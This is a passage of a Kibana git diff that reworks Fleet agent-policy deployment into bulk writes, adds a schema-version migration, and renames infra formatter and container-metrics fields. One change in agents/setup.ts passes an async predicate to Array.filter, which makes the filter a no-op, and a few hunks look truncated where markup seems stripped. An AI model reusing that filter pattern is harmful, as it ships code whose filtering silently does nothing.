-235,6 +236,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'test-logs-some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-logs', data_stream: { namespace: 'default' }, @@ -261,6 +263,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'test-metrics-some-template-some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-metrics', data_stream: { namespace: 'default' }, @@ -283,6 +286,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-metrics', data_stream: { namespace: 'default' }, @@ -330,6 +334,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'test-logs-some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-logs', data_stream: { namespace: 'default' }, @@ -362,6 +367,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { { id: 'test-logs-some-uuid', name: 'mock-package-policy', + package_policy_id: 'some-uuid', revision: 1, type: 'test-logs', data_stream: { namespace: 'default' }, @@ -425,6 +431,7 @@ describe('Fleet - storedPackagePoliciesToAgentInputs', () => { id: 'test-logs-some-uuid', revision: 1, name: 'mock-package-policy', + package_policy_id: 'some-uuid', type: 'test-logs', data_stream: { namespace: 'default' }, use_output: 'default', diff --git a/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.ts b/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.ts index 111c07d78472f..fd8d925b48855 100644 --- a/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.ts +++ b/x-pack/plugins/fleet/server/services/agent_policies/package_policies_to_agent_inputs.ts @@ -57,6 +57,7 @@ export const storedPackagePolicyToAgentInputs = ( namespace: packagePolicy.namespace || 'default', }, use_output: outputId, + package_policy_id: packagePolicy.id, ...(input.compiled_input || {}), ...(input.streams.length ? { diff --git a/x-pack/plugins/fleet/server/services/agent_policy.test.ts b/x-pack/plugins/fleet/server/services/agent_policy.test.ts index 2d5bc0aa4f88a..4d348af471772 100644 --- a/x-pack/plugins/fleet/server/services/agent_policy.test.ts +++ b/x-pack/plugins/fleet/server/services/agent_policy.test.ts @@ -18,6 +18,8 @@ import type { import { AGENT_POLICY_SAVED_OBJECT_TYPE } from '../constants'; +import { AGENT_POLICY_INDEX } from '../../common'; + import { agentPolicyService } from './agent_policy'; import { agentPolicyUpdateEventHandler } from './agent_policy_update'; @@ -67,7 +69,6 @@ jest.mock('./agents'); jest.mock('./package_policy'); jest.mock('./app_context'); jest.mock('./agent_policies/full_agent_policy'); -jest.mock('uuid/v5'); const mockedAppContextService = appContextService as jest.Mocked; const mockedOutputService = outputService as jest.Mocked; @@ -383,11 +384,15 @@ describe('agent policy', () => { mockedOutputService.getDefaultDataOutputId.mockResolvedValue('default-output'); mockedGetFullAgentPolicy.mockResolvedValue(null); - soClient.get.mockResolvedValue({ + const mockSo = { attributes: {}, id: 'policy123', type: 'mocked', references: [], + }; + soClient.get.mockResolvedValue(mockSo); + soClient.bulkGet.mockResolvedValue({ + saved_objects: [mockSo], }); await agentPolicyService.deployPolicy(soClient, 'policy123'); @@ -409,24 +414,36 @@ describe('agent policy', () => { ], } as FullAgentPolicy); - soClient.get.mockResolvedValue({ + const mockSo = { attributes: {}, id: 'policy123', type: 'mocked', references: [], + }; + soClient.get.mockResolvedValue(mockSo); + soClient.bulkGet.mockResolvedValue({ + saved_objects: [mockSo], }); await agentPolicyService.deployPolicy(soClient, 'policy123'); - expect(esClient.create).toBeCalledWith( + expect(esClient.bulk).toBeCalledWith( expect.objectContaining({ - index: '.fleet-policies', - body: expect.objectContaining({ - '@timestamp': expect.anything(), - data: { id: 'policy123', inputs: [{ id: 'input-123' }], revision: 1 }, - default_fleet_server: false, - policy_id: 'policy123', - revision_idx: 1, - }), + index: AGENT_POLICY_INDEX, + body: [ + expect.objectContaining({ + index: { + _id: expect.anything(), + }, + }), + expect.objectContaining({ + '@timestamp': expect.anything(), + data: { id: 'policy123', inputs: [{ id: 'input-123' }], revision: 1 }, + default_fleet_server: false, + policy_id: 'policy123', + revision_idx: 1, + }), + ], + refresh: 'wait_for', }) ); }); diff --git a/x-pack/plugins/fleet/server/services/agent_policy.ts b/x-pack/plugins/fleet/server/services/agent_policy.ts index 79ce7d3a3656b..4008100518984 100644 --- a/x-pack/plugins/fleet/server/services/agent_policy.ts +++ b/x-pack/plugins/fleet/server/services/agent_policy.ts @@ -5,11 +5,11 @@ * 2.0. */ -import { uniq, omit, isEqual } from 'lodash'; -import uuid from 'uuid/v4'; +import { uniq, omit, isEqual, keyBy } from 'lodash'; import uuidv5 from 'uuid/v5'; import { safeDump } from 'js-yaml'; import pMap from 'p-map'; +import { lt } from 'semver'; import type { ElasticsearchClient, SavedObjectsClientContract, @@ -17,6 +17,7 @@ import type { } from '@kbn/core/server'; import type { AuthenticatedUser } from '@kbn/security-plugin/server'; +import type { BulkResponseItem } from '@elastic/elasticsearch/lib/api/typesWithBodyKey'; import { DEFAULT_SPACE_ID } from '@kbn/spaces-plugin/common/constants'; @@ -25,6 +26,7 @@ import { AGENTS_PREFIX, PRECONFIGURATION_DELETION_RECORD_SAVED_OBJECT_TYPE, SO_SEARCH_LIMIT, + FLEET_AGENT_POLICIES_SCHEMA_VERSION, } from '../constants'; import type { PackagePolicy, @@ -51,7 +53,11 @@ import type { Output, DeletePackagePoliciesResponse, } from '../../common/types'; -import { AgentPolicyNameExistsError, HostedAgentPolicyRestrictionRelatedError } from '../errors'; +import { + AgentPolicyNameExistsError, + HostedAgentPolicyRestrictionRelatedError, + AgentPolicyNotFoundError, +} from '../errors'; import type { FullAgentConfigMap } from '../../common/types/models/agent_cm'; @@ -204,6 +210,7 @@ class AgentPolicyService { revision: 1, updated_at: new Date().toISOString(), updated_by: options?.user?.username || 'system', + schema_version: FLEET_AGENT_POLICIES_SCHEMA_VERSION, } as AgentPolicy, options ); @@ -256,7 +263,10 @@ class AgentPolicyService { agentPolicy.package_policies = (await packagePolicyService.getByIDs( soClient, - (agentPolicySO.attributes.package_policies as string[]) || [] + (agentPolicySO.attributes.package_policies as string[]) || [], + { + ignoreMissing: true, + } )) || []; } @@ -266,16 +276,44 @@ class AgentPolicyService { public async getByIDs( soClient: SavedObjectsClientContract, ids: string[], - options: { fields?: string[] } = {} + options: { fields?: string[]; withPackagePolicies?: boolean; ignoreMissing?: boolean } = {} ): Promise { const objects = ids.map((id) => ({ ...options, id, type: SAVED_OBJECT_TYPE })); - const agentPolicySO = await soClient.bulkGet(objects); + const bulkGetResponse = await soClient.bulkGet(objects); - return agentPolicySO.saved_objects.map((so) => ({ - id: so.id, - version: so.version, - ...so.attributes, - })); + const agentPolicies = await pMap( + bulkGetResponse.saved_objects, + async (agentPolicySO) => { + if (agentPolicySO.error) { + if (options.ignoreMissing && agentPolicySO.error.statusCode === 404) { + return null; + } else if (agentPolicySO.error.statusCode === 404) { + throw new AgentPolicyNotFoundError(`Agent policy ${agentPolicySO.id} not found`); + } else { + throw new Error(agentPolicySO.error.message); + } + } + + const agentPolicy = { + id: agentPolicySO.id, + ...agentPolicySO.attributes, + }; + if (options.withPackagePolicies) { + const agentPolicyWithPackagePolicies = await this.get( + soClient, + agentPolicySO.id, + options.withPackagePolicies + ); + if (agentPolicyWithPackagePolicies) { + agentPolicy.package_policies = agentPolicyWithPackagePolicies.package_policies; + } + } + return agentPolicy; + }, + { concurrency: 50 } + ); + + return agentPolicies.filter((agentPolicy): agentPolicy is AgentPolicy => agentPolicy !== null); } public async list( @@ -707,6 +745,10 @@ class AgentPolicyService { } public async deployPolicy(soClient: SavedObjectsClientContract, agentPolicyId: string) { + await this.deployPolicies(soClient, [agentPolicyId]); + } + + public async deployPolicies(soClient: SavedObjectsClientContract, agentPolicyIds: string[]) { // Use internal ES client so we have permissions to write to .fleet* indices const esClient = appContextService.getInternalUserESClient(); const defaultOutputId = await outputService.getDefaultDataOutputId(soClient); @@ -715,31 +757,93 @@ class AgentPolicyService { return; } - const policy = await agentPolicyService.get(soClient, agentPolicyId); - const fullPolicy = await agentPolicyService.getFullAgentPolicy(soClient, agentPolicyId); - if (!policy || !fullPolicy || !fullPolicy.revision) { - return; - } + const policies = await agentPolicyService.getByIDs(soClient, agentPolicyIds); + const policiesMap = keyBy(policies, 'id'); + const fullPolicies = await Promise.all( + agentPolicyIds.map((agentPolicyId) => + // There are some potential performance concerns around using `getFullAgentPolicy` in this context, e.g. + // re-fetching outputs, settings, and upgrade download source URI data for each policy. This could potentially + // be a bottleneck in environments with several thousand agent policies being deployed here. + agentPolicyService.getFullAgentPolicy(soClient, agentPolicyId) + ) + ); - const fleetServerPolicy: FleetServerPolicy = { - '@timestamp': new Date().toISOString(), - revision_idx: fullPolicy.revision, - coordinator_idx: 0, - data: fullPolicy as unknown as FleetServerPolicy['data'], - policy_id: fullPolicy.id, - default_fleet_server: policy.is_default_fleet_server === true, - }; + const fleetServerPolicies = fullPolicies.reduce((acc, fullPolicy) => { + if (!fullPolicy || !fullPolicy.revision) { + return acc; + } - if (policy.unenroll_timeout) { - fleetServerPolicy.unenroll_timeout = policy.unenroll_timeout; - } + const policy = policiesMap[fullPolicy.id]; + if (!policy) { + return acc; + } + + const fleetServerPolicy: FleetServerPolicy = { + '@timestamp': new Date().toISOString(), + revision_idx: fullPolicy.revision, + coordinator_idx: 0, + data: fullPolicy as unknown as FleetServerPolicy['data'], + policy_id: fullPolicy.id, + default_fleet_server: policy.is_default_fleet_server === true, + }; + + if (policy.unenroll_timeout) { + fleetServerPolicy.unenroll_timeout = policy.unenroll_timeout; + } + + return [...acc, fleetServerPolicy]; + }, [] as FleetServerPolicy[]); - await esClient.create({ + const fleetServerPoliciesBulkBody = fleetServerPolicies.flatMap((fleetServerPolicy) => [ + { + index: { + _id: uuidv5( + `${fleetServerPolicy.policy_id}:${fleetServerPolicy.revision_idx}`, + uuidv5.DNS + ), + }, + }, + fleetServerPolicy, + ]); + + const bulkResponse = await esClient.bulk({ index: AGENT_POLICY_INDEX, - body: fleetServerPolicy, - id: uuid(), + body: fleetServerPoliciesBulkBody, refresh: 'wait_for', }); + + if (bulkResponse.errors) { + const logger = appContextService.getLogger(); + const erroredDocuments = bulkResponse.items.reduce((acc, item) => { + const value: BulkResponseItem | undefined = item.index; + if (!value || !value.error) { + return acc; + } + + return [...acc, value]; + }, [] as BulkResponseItem[]); + + logger.debug( + `Failed to index documents during policy deployment: ${JSON.stringify(erroredDocuments)}` + ); + } + + await Promise.all( + fleetServerPolicies + .filter((fleetServerPolicy) => { + const policy = policiesMap[fleetServerPolicy.policy_id]; + return ( + !policy.schema_version || lt(policy.schema_version, FLEET_AGENT_POLICIES_SCHEMA_VERSION) + ); + }) + .map((fleetServerPolicy) => + // There are some potential performance concerns around using `agentPolicyService.update` in this context. + // This could potentially be a bottleneck in environments with several thousand agent policies being deployed here. + agentPolicyService.update(soClient, esClient, fleetServerPolicy.policy_id, { + schema_version: FLEET_AGENT_POLICIES_SCHEMA_VERSION, + }) + ) + ); } public async deleteFleetServerPoliciesForPolicyId( diff --git a/x-pack/plugins/fleet/server/services/agents/hosted_agent.ts b/x-pack/plugins/fleet/server/services/agents/hosted_agent.ts index 0c26e09575ac3..4acba8551e86d 100644 --- a/x-pack/plugins/fleet/server/services/agents/hosted_agent.ts +++ b/x-pack/plugins/fleet/server/services/agents/hosted_agent.ts @@ -22,6 +22,7 @@ export async function getHostedPolicies( // get the agent policies for those ids const agentPolicies = await agentPolicyService.getByIDs(soClient, Array.from(policyIdsToGet), { fields: ['is_managed'], + ignoreMissing: true, }); const hostedPolicies = agentPolicies.reduce>((acc, policy) => { acc[policy.id] = policy.is_managed; diff --git a/x-pack/plugins/fleet/server/services/agents/setup.ts b/x-pack/plugins/fleet/server/services/agents/setup.ts index 75ab47ae90375..a6536812a5e58 100644 --- a/x-pack/plugins/fleet/server/services/agents/setup.ts +++ b/x-pack/plugins/fleet/server/services/agents/setup.ts @@ -21,16 +21,12 @@ export async function ensureFleetServerAgentPoliciesExists( perPage: SO_SEARCH_LIMIT, }); - await Promise.all( - agentPolicies.map(async (agentPolicy) => { - const policyChangeActionExist = !!(await agentPolicyService.getLatestFleetPolicy( - esClient, - agentPolicy.id - )); + const outdatedAgentPolicyIds = agentPolicies + .filter( + async (agentPolicy) => + !!(await agentPolicyService.getLatestFleetPolicy(esClient, agentPolicy.id)) + ) + .map((agentPolicy) => agentPolicy.id); - if (!policyChangeActionExist) { - return agentPolicyService.deployPolicy(soClient, agentPolicy.id); - } - }) - ); + await agentPolicyService.deployPolicies(soClient, outdatedAgentPolicyIds); } diff --git a/x-pack/plugins/fleet/server/services/agents/status.test.ts b/x-pack/plugins/fleet/server/services/agents/status.test.ts index 8b30edeb5b5f8..7c598bf783c14 100644 --- a/x-pack/plugins/fleet/server/services/agents/status.test.ts +++ b/x-pack/plugins/fleet/server/services/agents/status.test.ts @@ -37,6 +37,7 @@ describe('Agent status service', () => { _id: 'id', _source: { active: true, + policy_revision_idx: 1, last_checkin: new Date().toISOString(), local_metadata: {}, user_provided_metadata: {}, @@ -92,6 +93,7 @@ describe('Agent status service', () => { _source: { active: true, last_checkin: new Date(Date.now() - 10 * AGENT_POLLING_THRESHOLD_MS - 1000).toISOString(), + policy_revision_idx: 2, local_metadata: {}, user_provided_metadata: {}, }, diff --git a/x-pack/plugins/fleet/server/services/package_policy.ts b/x-pack/plugins/fleet/server/services/package_policy.ts index ecdff37854b27..0e9c2fda047d1 100644 --- a/x-pack/plugins/fleet/server/services/package_policy.ts +++ b/x-pack/plugins/fleet/server/services/package_policy.ts @@ -54,6 +54,7 @@ import { PackagePolicyIneligibleForUpgradeError, PackagePolicyValidationError, PackagePolicyRestrictionRelatedError, + PackagePolicyNotFoundError, } from '../errors'; import { NewPackagePolicySchema, PackagePolicySchema, UpdatePackagePolicySchema } from '../types'; import type { @@ -293,7 +294,8 @@ class PackagePolicyService implements PackagePolicyServiceInterface { public async getByIDs( soClient: SavedObjectsClientContract, - ids: string[] + ids: string[], + options: { ignoreMissing?: boolean } = {} ): Promise { const packagePolicySO = await soClient.bulkGet( ids.map((id) => ({ @@ -305,11 +307,25 @@ class PackagePolicyService implements PackagePolicyServiceInterface { return null; } - return packagePolicySO.saved_objects.map((so) => ({ - id: so.id, - version: so.version, - ...so.attributes, - })); + return packagePolicySO.saved_objects + .map((so): PackagePolicy | null => { + if (so.error) { + if (options.ignoreMissing && so.error.statusCode === 404) { + return null; + } else if (so.error.statusCode === 404) { + throw new PackagePolicyNotFoundError(`Package policy ${so.id} not found`); + } else { + throw new Error(so.error.message); + } + } + + return { + id: so.id, + version: so.version, + ...so.attributes, + }; + }) + .filter((packagePolicy): packagePolicy is PackagePolicy => packagePolicy !== null); } public async list( @@ -1265,7 +1281,11 @@ export interface PackagePolicyServiceInterface { get(soClient: SavedObjectsClientContract, id: string): Promise; - getByIDs(soClient: SavedObjectsClientContract, ids: string[]): Promise; + getByIDs( + soClient: SavedObjectsClientContract, + ids: string[], + options?: { ignoreMissing?: boolean } + ): Promise; list( soClient: SavedObjectsClientContract, diff --git a/x-pack/plugins/fleet/server/services/setup.test.ts b/x-pack/plugins/fleet/server/services/setup.test.ts index ba32b15533c20..34336f8167316 100644 --- a/x-pack/plugins/fleet/server/services/setup.test.ts +++ b/x-pack/plugins/fleet/server/services/setup.test.ts @@ -58,6 +58,8 @@ describe('setupFleet', () => { }); (upgradeManagedPackagePolicies as jest.Mock).mockResolvedValue([]); + + soClient.find.mockResolvedValue({ saved_objects: [] } as any); }); afterEach(async () => { diff --git a/x-pack/plugins/fleet/server/services/setup.ts b/x-pack/plugins/fleet/server/services/setup.ts index f3a802e81739d..e9b26e50735b9 100644 --- a/x-pack/plugins/fleet/server/services/setup.ts +++ b/x-pack/plugins/fleet/server/services/setup.ts @@ -41,6 +41,7 @@ import type { UpgradeManagedPackagePoliciesResult } from './managed_package_poli import { upgradeManagedPackagePolicies } from './managed_package_policies'; import { getBundledPackages } from './epm/packages'; import { upgradePackageInstallVersion } from './setup/upgrade_package_install_version'; +import { upgradeAgentPolicySchemaVersion } from './setup/upgrade_agent_policy_schema_version'; export interface SetupStatus { isInitialized: boolean; @@ -130,6 +131,9 @@ async function createSetupSideEffects( logger.debug('Upgrade Fleet package install versions'); await upgradePackageInstallVersion({ soClient, esClient, logger }); + logger.debug('Upgrade Agent policy schema version'); + await upgradeAgentPolicySchemaVersion(soClient); + logger.debug('Setting up Fleet enrollment keys'); await ensureDefaultEnrollmentAPIKeysExists(soClient, esClient); diff --git a/x-pack/plugins/fleet/server/services/setup/index.ts b/x-pack/plugins/fleet/server/services/setup/index.ts index 1646e501c8cab..a360a59a13930 100644 --- a/x-pack/plugins/fleet/server/services/setup/index.ts +++ b/x-pack/plugins/fleet/server/services/setup/index.ts @@ -6,3 +6,4 @@ */ export { upgradePackageInstallVersion } from './upgrade_package_install_version'; +export { upgradeAgentPolicySchemaVersion } from './upgrade_agent_policy_schema_version'; diff --git a/x-pack/plugins/fleet/server/services/setup/upgrade_agent_policy_schema_version.ts b/x-pack/plugins/fleet/server/services/setup/upgrade_agent_policy_schema_version.ts new file mode 100644 index 0000000000000..a02c81c2cfab1 --- /dev/null +++ b/x-pack/plugins/fleet/server/services/setup/upgrade_agent_policy_schema_version.ts @@ -0,0 +1,38 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import type { SavedObjectsClientContract } from '@kbn/core/server'; + +import { + AGENT_POLICY_SAVED_OBJECT_TYPE, + FLEET_AGENT_POLICIES_SCHEMA_VERSION, + SO_SEARCH_LIMIT, +} from '../../constants'; +import { agentPolicyService } from '../agent_policy'; + +function getOutdatedAgentPoliciesBatch(soClient: SavedObjectsClientContract) { + return agentPolicyService.list(soClient, { + perPage: SO_SEARCH_LIMIT, + kuery: `NOT ${AGENT_POLICY_SAVED_OBJECT_TYPE}.schema_version:${FLEET_AGENT_POLICIES_SCHEMA_VERSION}`, + }); +} + +// used to migrate ingest-agent-policies SOs to .fleet-policies +// fetch SOs from ingest-agent-policies with outdated schema_version +// deploy outdated policies to .fleet-policies index +// bump oudated SOs schema_version +export async function upgradeAgentPolicySchemaVersion(soClient: SavedObjectsClientContract) { + let outdatedAgentPolicies = await getOutdatedAgentPoliciesBatch(soClient); + + while (outdatedAgentPolicies.total > 0) { + const outdatedAgentPolicyIds = outdatedAgentPolicies.items.map( + (outdatedAgentPolicy) => outdatedAgentPolicy.id + ); + await agentPolicyService.deployPolicies(soClient, outdatedAgentPolicyIds); + outdatedAgentPolicies = await getOutdatedAgentPoliciesBatch(soClient); + } +} diff --git a/x-pack/plugins/fleet/server/types/rest_spec/agent_policy.ts b/x-pack/plugins/fleet/server/types/rest_spec/agent_policy.ts index 1f793445bf630..c2599d79b3364 100644 --- a/x-pack/plugins/fleet/server/types/rest_spec/agent_policy.ts +++ b/x-pack/plugins/fleet/server/types/rest_spec/agent_policy.ts @@ -9,7 +9,7 @@ import { schema } from '@kbn/config-schema'; import { NewAgentPolicySchema } from '../models'; -import { ListWithKuerySchema } from '.'; +import { ListWithKuerySchema, BulkRequestBodySchema } from './common'; export const GetAgentPoliciesRequestSchema = { query: ListWithKuerySchema.extends({ @@ -17,6 +17,12 @@ export const GetAgentPoliciesRequestSchema = { }), }; +export const BulkGetAgentPoliciesRequestSchema = { + body: BulkRequestBodySchema.extends({ + full: schema.maybe(schema.boolean()), + }), +}; + export const GetOneAgentPolicyRequestSchema = { params: schema.object({ agentPolicyId: schema.string(), diff --git a/x-pack/plugins/fleet/server/types/rest_spec/common.ts b/x-pack/plugins/fleet/server/types/rest_spec/common.ts index 2d12bd5d7c987..0c5f16ff87f90 100644 --- a/x-pack/plugins/fleet/server/types/rest_spec/common.ts +++ b/x-pack/plugins/fleet/server/types/rest_spec/common.ts @@ -22,4 +22,9 @@ export const ListWithKuerySchema = schema.object({ ), }); +export const BulkRequestBodySchema = schema.object({ + ids: schema.arrayOf(schema.string(), { minSize: 1 }), + ignoreMissing: schema.maybe(schema.boolean()), +}); + export type ListWithKuery = TypeOf; diff --git a/x-pack/plugins/fleet/server/types/rest_spec/package_policy.ts b/x-pack/plugins/fleet/server/types/rest_spec/package_policy.ts index b085060286d05..fa7cdce92400b 100644 --- a/x-pack/plugins/fleet/server/types/rest_spec/package_policy.ts +++ b/x-pack/plugins/fleet/server/types/rest_spec/package_policy.ts @@ -12,12 +12,16 @@ import { UpdatePackagePolicyRequestBodySchema, } from '../models'; -import { ListWithKuerySchema } from '.'; +import { ListWithKuerySchema, BulkRequestBodySchema } from './common'; export const GetPackagePoliciesRequestSchema = { query: ListWithKuerySchema, }; +export const BulkGetPackagePoliciesRequestSchema = { + body: BulkRequestBodySchema, +}; + export const GetOnePackagePolicyRequestSchema = { params: schema.object({ packagePolicyId: schema.string(), diff --git a/x-pack/plugins/graph/public/components/field_manager/field_picker.tsx b/x-pack/plugins/graph/public/components/field_manager/field_picker.tsx index bc7718b142231..6a3126c8617cb 100644 --- a/x-pack/plugins/graph/public/components/field_manager/field_picker.tsx +++ b/x-pack/plugins/graph/public/components/field_manager/field_picker.tsx @@ -63,7 +63,7 @@ export function FieldPicker({ aria-disabled={!hasFields} onClick={() => { if (hasFields) { - setOpen(true); + setOpen(!open); } }} onClickAriaLabel={badgeDescription} diff --git a/x-pack/plugins/infra/common/formatters/high_precision.ts b/x-pack/plugins/infra/common/formatters/high_precision.ts index 70e4d3a0d1796..d111d61346736 100644 --- a/x-pack/plugins/infra/common/formatters/high_precision.ts +++ b/x-pack/plugins/infra/common/formatters/high_precision.ts @@ -5,7 +5,7 @@ * 2.0. */ -export const formatHighPercision = (val: number) => { +export const formatHighPrecision = (val: number) => { return Number(val).toLocaleString('en', { maximumFractionDigits: 5, }); diff --git a/x-pack/plugins/infra/common/formatters/index.ts b/x-pack/plugins/infra/common/formatters/index.ts index 372df5b28ca1b..efa4f2faf769f 100644 --- a/x-pack/plugins/infra/common/formatters/index.ts +++ b/x-pack/plugins/infra/common/formatters/index.ts @@ -9,7 +9,7 @@ import { createBytesFormatter } from './bytes'; import { formatNumber } from './number'; import { formatPercent } from './percent'; import { InventoryFormatterType } from '../inventory_models/types'; -import { formatHighPercision } from './high_precision'; +import { formatHighPrecision } from './high_precision'; import { InfraWaffleMapDataFormat } from './types'; export const FORMATTERS = { @@ -22,7 +22,7 @@ export const FORMATTERS = { // bytes in bits formatted string out bits: createBytesFormatter(InfraWaffleMapDataFormat.bitsDecimal), percent: formatPercent, - highPercision: formatHighPercision, + highPrecision: formatHighPrecision, }; export const createFormatter = diff --git a/x-pack/plugins/infra/common/inventory_models/aws_rds/layout.tsx b/x-pack/plugins/infra/common/inventory_models/aws_rds/layout.tsx index 3c52b6ec623d8..025119cff2f85 100644 --- a/x-pack/plugins/infra/common/inventory_models/aws_rds/layout.tsx +++ b/x-pack/plugins/infra/common/inventory_models/aws_rds/layout.tsx @@ -143,7 +143,7 @@ export const Layout = withTheme(({ metrics, onChangeRangeTime, theme }: LayoutPr ; export type InventoryItemType = rt.TypeOf; diff --git a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.stories.tsx b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.stories.tsx index 260e082796464..2064be4f19612 100644 --- a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.stories.tsx +++ b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.stories.tsx @@ -59,27 +59,27 @@ export default { const loadedContainers: ContainerNodeMetricsRow[] = [ { - name: 'gke-edge-oblt-pool-1-9a60016d-lgg1', + id: 'gke-edge-oblt-pool-1-9a60016d-lgg1', averageCpuUsagePercent: 99, averageMemoryUsageMegabytes: 34, }, { - name: 'gke-edge-oblt-pool-1-9a60016d-lgg2', + id: 'gke-edge-oblt-pool-1-9a60016d-lgg2', averageCpuUsagePercent: 72, averageMemoryUsageMegabytes: 68, }, { - name: 'gke-edge-oblt-pool-1-9a60016d-lgg3', + id: 'gke-edge-oblt-pool-1-9a60016d-lgg3', averageCpuUsagePercent: 54, averageMemoryUsageMegabytes: 132, }, { - name: 'gke-edge-oblt-pool-1-9a60016d-lgg4', + id: 'gke-edge-oblt-pool-1-9a60016d-lgg4', averageCpuUsagePercent: 34, averageMemoryUsageMegabytes: 264, }, { - name: 'gke-edge-oblt-pool-1-9a60016d-lgg5', + id: 'gke-edge-oblt-pool-1-9a60016d-lgg5', averageCpuUsagePercent: 13, averageMemoryUsageMegabytes: 512, }, diff --git a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.test.tsx b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.test.tsx index 92bff357f77db..2395e3bca195a 100644 --- a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.test.tsx +++ b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.test.tsx @@ -94,7 +94,7 @@ describe('ContainerMetricsTable', () => { isLoading={true} setCurrentPageIndex={jest.fn()} setSortState={jest.fn()} - sortState={{ field: 'name', direction: 'asc' }} + sortState={{ field: 'id', direction: 'asc' }} timerange={{ from: new Date().toISOString(), to: new Date().toISOString() }} /> @@ -113,7 +113,7 @@ describe('ContainerMetricsTable', () => { isLoading={false} setCurrentPageIndex={jest.fn()} setSortState={jest.fn()} - sortState={{ field: 'name', direction: 'asc' }} + sortState={{ field: 'id', direction: 'asc' }} timerange={{ from: new Date().toISOString(), to: new Date().toISOString() }} /> diff --git a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.tsx b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.tsx index 74348d00f6f8f..c4273733aacb9 100644 --- a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.tsx +++ b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/container_metrics_table.tsx @@ -115,20 +115,15 @@ function containerNodeColumns( ): Array> { return [ { - name: i18n.translate('xpack.infra.metricsTable.container.nameColumnHeader', { - defaultMessage: 'Name', + name: i18n.translate('xpack.infra.metricsTable.container.idColumnHeader', { + defaultMessage: 'Id', }), - field: 'name', + field: 'id', truncateText: true, textOnly: true, - render: (name: string) => { + render: (id: string) => { return ( - + ); }, }, diff --git a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/use_container_metrics_table.ts b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/use_container_metrics_table.ts index 411087113ca59..5f60d1751ee96 100644 --- a/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/use_container_metrics_table.ts +++ b/x-pack/plugins/infra/public/components/infrastructure_node_metrics_tables/container/use_container_metrics_table.ts @@ -47,7 +47,7 @@ export const metricByField = createMetricByFieldLookup(containerMetricsQueryConf const unpackMetric = makeUnpackMetric(metricByField); export interface ContainerNodeMetricsRow { - name: string; + id: string; averageCpuUsagePercent: number | null; averageMemoryUsageMegabytes: number | null; } @@ -91,14 +91,14 @@ function seriesToContainerNodeMetricsRow(series: MetricsExplorerSeries): Contain } return { - name: series.id, + id: series.id, ...calculateMetricAverages(series.rows), }; } -function rowWithoutMetrics(name: string) { +function rowWithoutMetrics(id: string) { return { - name, + id, averageCpuUsagePercent: null, averageMemoryUsageMegabytes: null, }; @@ -148,7 +148,7 @@ function collectMetricValues(rows: MetricsExplorerRow[]) { }; } -function unpackMetrics(row: MetricsExplorerRow): Omit { +function unpackMetrics(row: MetricsExplorerRow): Omit { return { averageCpuUsagePercent: unpackMetric(row, 'kubernetes.container.cpu.usage.limit.pct'), averageMemoryUsageMegabytes: unpackMetric(row, 'kubernetes.container.memory.usage.bytes'), diff --git a/x-pack/plugins/infra/public/containers/metrics_explorer/with_metrics_explorer_options_url_state.tsx b/x-pack/plugins/infra/public/containers/metrics_explorer/with_metrics_explorer_options_url_state.tsx index e66191923e39a..56de138d19b51 100644 --- a/x-pack/plugins/infra/public/containers/metrics_explorer/with_metrics_explorer_options_url_state.tsx +++ b/x-pack/plugins/infra/public/containers/metrics_explorer/with_metrics_explorer_options_url_state.tsx @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import React, { useContext, useMemo } from 'react'; import { ThrowReporter } from 'io-ts/lib/ThrowReporter'; import { UrlStateContainer } from '../../utils/url_state'; diff --git a/x-pack/plugins/infra/public/pages/link_to/link_to_logs.test.tsx b/x-pack/plugins/infra/public/pages/link_to/link_to_logs.test.tsx index 6f4b0e73f0c33..5ed7ab99b4a3e 100644 --- a/x-pack/plugins/infra/public/pages/link_to/link_to_logs.test.tsx +++ b/x-pack/plugins/infra/public/pages/link_to/link_to_logs.test.tsx @@ -11,7 +11,7 @@ import React from 'react'; import { Route, Router, Switch } from 'react-router-dom'; import { httpServiceMock } from '@kbn/core/public/mocks'; import { KibanaContextProvider } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { useLogView } from '../../hooks/use_log_view'; import { createLoadedUseLogViewMock, diff --git a/x-pack/plugins/infra/public/pages/logs/page_template.tsx b/x-pack/plugins/infra/public/pages/logs/page_template.tsx index 